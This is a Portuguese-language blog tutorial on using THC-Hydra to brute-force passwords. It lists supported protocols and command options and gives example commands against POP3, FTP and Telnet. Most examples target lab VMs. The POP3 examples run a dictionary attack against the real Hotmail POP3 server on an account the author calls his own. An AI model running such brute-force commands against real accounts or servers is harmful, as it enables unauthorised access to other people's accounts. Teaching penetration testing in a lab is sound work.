Tutorial THC-Hydra pt1

thc 300x300 - Tutorial THC-Hydra pt1

THC-Hydra

O THC-Hydra é uma ferramenta para ataques de força-bruta (brute-force) para vários protocolos de rede actualmente são suportados os protocolos listados em baixo, neste tutorial não vamos abordar todos os protocolos , futuramente vamos falar sobre cada um deles;

TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,

RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,

ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,LDAP2, Cisco AAA

Neste tutorial vamos utilizar o THC-Hydra para descobrir senhas dos seguintes protocolos: pop3, FTP, Telnet e SMB, todos os ataques vão ser realizados em maquinas virtuais dentro da minha rede e todas as passwords vão ser previamente definidas no dicionário a utilizar;

Ip do Servidor : 192.168.10.5

Ip Local : 192.168.10.3

Utilizador:  mail

Email – mail[at]live.com.pt

Password – *****

Sintaxe:

 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]

 server service [OPT]

Options:

  -R        #Restaura uma sessão abortada;

  -S        #Conecta via SSL

  -s           porta    #Se o serviço estiver a correr numa porta diferente definir aqui

  -l           #Utilizador a utilizar;

 -L           #Ficheiro com varios utilizadores a utilizar;

 -p          #Password a utilizar;

-P           #Ficheiro ou dicionário de passwords a utilizar;

  -e ns     #Informação adicional o “n” verifica se existe passwords nulas e o “s” experimenta o nome do utilizador como password;

  -C ficheiro         #Ficheiro com utilizadores e passwords em coluna com o seguinte formato: “login:pass” e um por linha, é usado em vês das opções –Le –P;

  -M ficheiro       #Lista de servidores para ataques paralelos, um por linha;

  -o ficheiro         #Escreve utilizadores e passwords encontrados para um ficheiro em vez do stdout que imprime na tela;

  -f          #Desconecta depois de encontrar o primeiro utilizador/password;

  -t TASKS            #Executa as tarefas conforme o numero de ligações em paralelo, o padrão são 16;

  -w tempo         #Define o tempo maximo de espera em segundos para responder, o padrao é 30;

  -v / -V                                 #Modo detalhado;

  Servidor            #IP ou DNS do servidor alvo, pode-se usar a opção –M em substituição desta;

  Service               “Serviço ou protocolo a atacar, temos os seguintes disponíveis:

telnet,  ftp,  pop3[-ntlm],   imap[-ntlm], smb, smbnt, http[s]-{head|get} , http-{get|post}-form , http-proxy,  cisco ,  cisco-enable,  vnc,  ldap2,  ldap3,  mssql,  mysql,  oracle-listener,  postgres,  nntp,  socks5,    rexec,  rlogin,  pcnfs,  snmp,  rsh,  cvs,  svn,  icq,  sapr3,  ssh2,  smtp-auth[-ntlm] , pcanywhere,   teamspeak,  sip,  vmauthd …

Exemplos :

——————————————————————————————————-

POP3

Neste exemplo vamos descobrir a password do email paladin-teste[at]live.com.pt usando o ataque de força bruta, este email é meu e foi criado previamente para este exemplo;

Sintaxe:

#hydra –S –v –l mail[at]live.com.pt–P /root/dic.dic pop3.live.com pop3

Definição:

-S    -> Conecta por ligação segura;

-v    -> Modo detalhe, permite verificar as passwords mais facilmente;

-l   -> Email a descobrir a password;

-P  -> Directorio onde se encontra o dicionário a utilizar;

Pop3.live.com   -> Dns do servidor POP3 da Hotmail;

Pop3  -> Protocolo a ser utilizado, neste caso é o POP3;

 ——————————————————————————————————

FTP

#hydra 192.168.220.128 ftp -l paladin -P /root/dic.txt -e ns -t 15 -f  

——————————————————————————————————-

TELNET

#hydra 192.168.220.128 telnet -l paladin -P /root/dic.txt -e ns -t 15 -f

——————————————————————————————————-

POP3

#hydra pop3.live.com pop3 -S -p 995 -l mail[at]live.com.pt -P /pentest/passwords/wordlists/bt4-password.txt -e ns -t 15 -f -v

 

Add a Comment